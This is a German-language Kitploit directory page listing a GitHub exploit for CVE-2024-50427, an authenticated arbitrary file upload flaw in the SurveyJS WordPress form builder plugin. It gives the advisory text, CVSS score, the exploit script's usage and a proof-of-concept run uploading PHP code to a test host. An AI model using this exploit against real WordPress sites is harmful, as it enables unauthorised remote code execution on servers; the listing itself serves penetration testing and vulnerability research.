Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-50427 — SurveyJS: Drag & Drop WordPress Form Builder <= 1.9.136 - Authentifiziert (Subscriber+) beliebiger Datei-Upload | Kitploit
Tools/GitHubGitHub/randomrobbiebf/cve-2024-50427
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubrandomrobbiebf/cve-2024-50427

CVE-2024-50427

SurveyJS: Drag & Drop WordPress Form Builder <= 1.9.136 - Authentifiziert (Subscriber+) beliebiger Datei-Upload

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-50427

SurveyJS: Drag & Drop WordPress Form Builder <= 1.9.136 - Authentifizierter (Subscriber+) Beliebiger Datei-Upload

Beschreibung:

Das Plugin SurveyJS: Drag & Drop WordPress Form Builder zum Erstellen, Gestalten und Einbetten mehrerer Formulare beliebiger Komplexität für WordPress ist in allen Versionen bis einschließlich 1.9.136 anfällig für beliebige Datei-Uploads, da die Dateityp-Validierung fehlt. Dadurch ist es authentifizierten Angreifern mit Subscriber-Zugriff oder höher möglich, beliebige Dateien auf den Server der betroffenen Website hochzuladen, was Remote-Code-Ausführung ermöglichen kann.

root@kitploit:~
Published: 2024-10-24 00:00:00
CVE: CVE-2024-50427
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 8.8
Slugs: surveyjs

Verwendung

root@kitploit:~
usage: CVE-2024-50427.py [-h] [--code CODE] url username password

Upload a PHP file to a WordPress site.

positional arguments:
  url          The URL of the WordPress site (e.g., http://example.com)
  username     Your WordPress username
  password     Your WordPress password

options:
  -h, --help   show this help message and exit
  --code CODE  PHP code to execute

POC

root@kitploit:~
$ python3 CVE-2024-50427.py http://kubernetes.docker.internal [email protected] user --code "phpinfo();"
Login successful.
File uploaded successfully.
http://kubernetes.docker.internal/wp-content/uploads/surveyjs/158718452672e02bd1d7212.25114025.php
Tool herunterladen